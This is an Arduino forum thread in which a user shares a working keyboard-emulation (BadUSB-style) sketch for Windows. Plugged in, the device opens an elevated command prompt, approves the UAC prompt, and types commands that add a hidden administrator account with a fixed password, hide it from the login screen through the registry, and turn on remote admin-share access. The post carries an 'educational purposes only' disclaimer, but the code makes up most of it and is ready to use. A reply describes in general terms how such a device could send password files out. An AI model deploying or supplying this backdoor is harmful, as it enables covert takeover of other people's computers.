Go Down

Topic: Simple HID Attack Project (for Windows PCs) (Read 298 times) previous topic - next topic

jayxd116

Nov 18, 2016, 06:45 pm Last Edit: Nov 18, 2016, 07:00 pm by jayxd116 Reason: Addendum
Computers almost never perform a check on HIDs connected to the computer like a mouse, keyboard or joystick because as the name implies Human Interface Device, it's suppose to take inputs from that device without any questions because they're direct inputs from the user.

Imagine if your computer wouldn't trust your mice? "Excuse me Mr. User, I don't think that's a polite gesture you just used, as the operating system I hereby refuse to process your input."

Anyway, so the OS must give unquestioned privilege to HIDs unless they can tell human users from bots. Technically, your computer will accept characters from your keyboard at rate more than 1000 wpm (depending on how the device is configured). Though no one have done that before without smashing the keyboard or acquiring mutations that grants superhuman abilities, it's still possible (for a machine, of course) to "type" at those phenomenal speeds.

So, what does this mean? Trust from the OS + High speed character rates + enslavable typist, er.. machine = Hacking opportunities. For this project, I'll be using Windows as the target OS.

This project is intended for educational purposes only, I strongly advise hackers to use this project on their own computers only or devices they have been given permission.


Code: [Select]
#include <Keyboard.h>

//For the Arduino DUE, after uploading the code through the Programming port, transfer the cable to
//the Native USB port
//After letting the board run this script on your computer, make sure to delete the hidden user
//through the command line as it will not appear in the Control Panel. I will attach a batch file to
//undo this script

const String BackdoorUsername = "Hidden_User";
const String BackdoorPassword = "password123";

const String myScript[] PROGMEM = { //Type your commands here, one command per line.
                                    
//Example script to create a hidden backdoor in a Windows PC and enable Administrative shares
"net user " + BackdoorUsername + " " + BackdoorPassword + " /add",
"net localgroup Administrators " + BackdoorUsername + " /add",
"net accounts /maxpwage:unlimited",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v " + BackdoorUsername + " /t REG_DWORD /d 0 /f /reg:64",
"REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f /reg:64"


                                   };

//Don't forget to update this line
const int numLines = 5;

//Append all commands into one line of code each separated with an "&"
String constructCommandString(const String * str_arr, int sz){
  String finalString = "";

  for (int i = 0 ; i < sz - 1; i++){
    finalString += (str_arr[i] + " & ");
  }

  return finalString + str_arr[sz - 1] + " & exit";
}

void hitEnter(){                    // Send Enter
  Keyboard.releaseAll();
  Keyboard.press(0x0A);
  delay(20);
  Keyboard.release(0x0A);
}

void sendCommand(String cmd){       // Send a command to an active console
  Keyboard.releaseAll();
  delay(100);
  Keyboard.print(cmd);
  delay(200);
  hitEnter();
}
/*
void openApp(String app){
  Keyboard.releaseAll();          
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('r');              // Winkey + R to open Run dialog box
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  Keyboard.print(app);              // Types in the app filename and Enter
  hitEnter();                       //
}
*/
void openAdminCMD(){ //Works for Windows 8, 8.1 and 10 only
  Keyboard.releaseAll();
  Keyboard.press(KEY_LEFT_GUI);     //
  delay(20);                        //
  Keyboard.press('x');              // Sends a WinKey + X key combination
  delay(20);                        //
  Keyboard.releaseAll();            //
  delay(100);
  
  Keyboard.press('a');              //
  delay(20);                        // Shortcut letter for Administrator CMD
  Keyboard.release('a');            //
  
  delay(3000);                      // Wait until Administrator Prompt shows up

  Keyboard.press(KEY_LEFT_ARROW);   //
  delay(50);                        // Automatically selects Yes
  hitEnter();                       //
}

/*
void exitWindowsApp(){
  Keyboard.press(KEY_LEFT_ALT);     //
  delay(20);                        //
  Keyboard.press(' ');              // ALT + SPACE combination top open Window options
  Keyboard.releaseAll();            //
  delay(50);                        //
  
  Keyboard.press('c');              //
  delay(50);                        // C for close
  Keyboard.release('c');            //
}
*/
void executePWN(){
  //openApp("cmd");                 //
  openAdminCMD();                   // Current script requires an elevated cmd
  
  delay(200);                       // Delays are necessary to avoid typing before the Window appears
  
  sendCommand(constructCommandString(myScript, numLines));
  
  delay(50);
}

void setup() {
  pinMode(LED_BUILTIN, OUTPUT);
  digitalWrite(LED_BUILTIN, LOW);
  
  Keyboard.begin();
  
  delay(1000);
  executePWN();
}

void loop() {
  digitalWrite(LED_BUILTIN, HIGH);
  delay(80);
  digitalWrite(LED_BUILTIN, LOW);
  delay(80);
}


Addendum: Edit the backdoor removal batch file with a text editor according to the username you chose. I used "Power_User" in the script file, replace all occurrences with the username you've chosen.

xl97

nice project.

however this has been done many times before..  (but a nice twist on the account creation)

There are MANY variants of the RubberDucky project...

I myself made one not to long ago that also adds in an ESP8266 module (acting as a captive portal) to serve up my GUI page so I can execute (whatever pre-made actions) remotely from cell phone/tablet..etc..

We used it to play a joke on a fellow co-working..

sending text and moving his mouse all remotely through the ESP >> Pro-Micro  >> PC  toolchain


but could have easily reached out to the internet and executed a (malicious) payload if desired... or grabbed any number of protected/password files and sent them a remote local for cracking later on...etc..etc.







Go Up
 


Please enter a valid email to subscribe

Confirm your email address

We need to confirm your email address.
To complete the subscription, please click the link in the email we just sent you.

Thank you for subscribing!

Arduino
via Egeo 16
Torino, 10131
Italy